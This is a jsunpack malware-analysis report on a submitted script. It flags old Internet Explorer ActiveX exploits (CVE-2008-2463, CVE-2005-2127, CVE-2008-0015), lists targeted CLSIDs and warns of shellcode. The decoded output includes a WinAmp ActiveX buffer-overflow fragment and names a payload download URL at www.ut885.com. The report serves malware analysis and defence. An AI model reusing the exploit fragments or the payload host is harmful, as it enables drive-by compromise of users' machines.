JSUNPACK
A Generic JavaScript Unpacker
CAUTION: jsunpack was designed for security researchers and computer professionals
Enter a single URL (or paste JavaScript to decode):

Upload a PDF, pcap, HTML, or JavaScript file
Private? Help: privacy | uploads
Default Referer
Description

Submission permanent link 2a44256f5a51752849a4d856aa4355b23bcc8ee5 (Received 2017-11-07 13:04:21, script )

URLStatus
127.0.0.1/undefined

127.0.0.1/about:blank

127.0.0.1/./pdf.php

All Malicious or Suspicious Elements of Submission

malicious: MSOfficeSnapshotViewer CVE-2008-2463 detected F0E42D50-368C-11D0-AD81-00A0C90DC8D9
malicious: COMObjectInstantiationMemoryCorruption CVE-2005-2127 detected EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F
malicious: MSDirectShowCLSID CVE-2008-0015 detected 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
malicious: Alert detected /alert CVE-2008-2463 PrintSnapshot
suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /warning CVE-NO-MATCH Shellcode Engine Length 130770
www.ut885.com/pics/load.php?e=1 benign
[nothing detected] (var newurl) www.ut885.com/pics/load.php?e=1
     status: (referer=http:/www.ask.com/web?q=puppies)saved 330 bytes 48bf15d8359dc7d712627fc8431f13dfc1133404
     info: [0] no JavaScript
     file: 48bf15d8359dc7d712627fc8431f13dfc1133404: 330 bytes

Decoded Files
48bf/15d8359dc7d712627fc8431f13dfc1133404 from www.ut885.com/pics/load.php?e=1 (330 bytes) download


script malicious
[malicious:10] script
     info: [decodingLevel=0] found JavaScript
     info: DecodedGenericCLSID detected EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F BA018599-1DB3-44f9-83B4-461454C84BF8 F0E42D50-368C-11D0-AD81-00A0C90DC8D9 7F5B7F63-F06F-4331-8A26-339E03C0AE3D BD96C556-65A3-11D0-983A-00C04FC29E36 D0C07D56-7C69-43F1-B4A0-25F5A11FAB19 0006F03A-0000-0000-C000-000000000046 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF 06723E09-F4C2-43c8-8358-09FCD1DB0766 E8CCCDDF-CA28-496b-B050-6C07C962476B 6e32070a-766d-4ee6-879c-dc1fa91d2fc3 0006F033-0000-0000-C000-000000000046 639F725F-1B2D-4831-A9FD-874847682010 AB9BCEDD-EC7E-47E1-9322-D4A210617116 6414512B-B978-451D-A0D8-FCFDF33E833C
     malicious: MSOfficeSnapshotViewer CVE-2008-2463 detected F0E42D50-368C-11D0-AD81-00A0C90DC8D9
     malicious: COMObjectInstantiationMemoryCorruption CVE-2005-2127 detected EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F
     malicious: MSDirectShowCLSID CVE-2008-0015 detected 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
     info: ActiveXDataObjectsMDAC detected MSXML2.ServerXMLHTTP Microsoft.XMLHTTP
     info: [javascript variable] URL=www.ut885.com/pics/load.php?e=1
     info: [decodingLevel=1] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: ;');document.write('bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1');document.write('IWinAmpActiveX.ConvertFile bof,1,1,
          error: line:3: .^
     error: ./pre.js:249: SyntaxError: unterminated string literal:
          error: ./pre.js:249: location.href = "http:/localhost/?finish
          error: ./pre.js:249: ................^
     info: Decoding option navigator.systemLanguage=en and navigator.systemLanguage=zh-cn and browser=IE7/XP and browser=IE8/Vista and browser=Opera and browser=Firefox,      0 bytes
     info: Decoding option navigator.systemLanguage=en and navigator.systemLanguage=zh-cn and browser=IE7/XP and browser=IE8/Vista and browser=Opera,      2922 bytes
     info: Decoding option browser=Firefox,      2877 bytes
     malicious: Alert detected /alert CVE-2008-2463 PrintSnapshot
     suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /warning CVE-NO-MATCH Shellcode Engine Length 130770
     info: DecodedMsg detected /info.ActiveXObject snpvw.Snapshot Viewer Control.1
     info: [setAttribute src] URL=127.0.0.1/./pdf.php
     info: [setAttribute src] URL=127.0.0.1/about:blank
     info: [element] URL=127.0.0.1/undefined
     info: [var urltofile] URL=www.ut885.com/pics/load.php?e=1
     info: [var newurl] URL=www.ut885.com/pics/load.php?e=1
     info: [decodingLevel=2] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: ;bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))IWinAmpActiveX.ConvertFile bof,1,1,1,1,1IWinAmpActiveX.ConvertFile bof,1,1,1,1,1IWinAmpActiveX.ConvertFile bof,1,1,1,1,1IWinAmpActiveX.ConvertFile bof,1,1,1,1,1
          error: line:3: ...............................................................^
     error: line:58: SyntaxError: unterminated string literal:
          error: line:58: location.href = "http:/localhost/?finish
          error: line:58: ................^
     info: file: saved script to (6e04d09e19bc0e5a04dc2d0b2716b0d0ff010f94)
     file: 6e04d09e19bc0e5a04dc2d0b2716b0d0ff010f94: 31136 bytes
     file: 577674952c9c28ca199dab26b5a48bafbb27657e: 7420 bytes
     file: e5ed0da410311222c26bbfc2687eafb9c9d8f7e4: 2922 bytes

Decoded Files
6e04/d09e19bc0e5a04dc2d0b2716b0d0ff010f94 from script (31136 bytes, 7 hidden) download

5776/74952c9c28ca199dab26b5a48bafbb27657e from script (7420 bytes) download

e5ed/0da410311222c26bbfc2687eafb9c9d8f7e4 from script (2922 bytes) download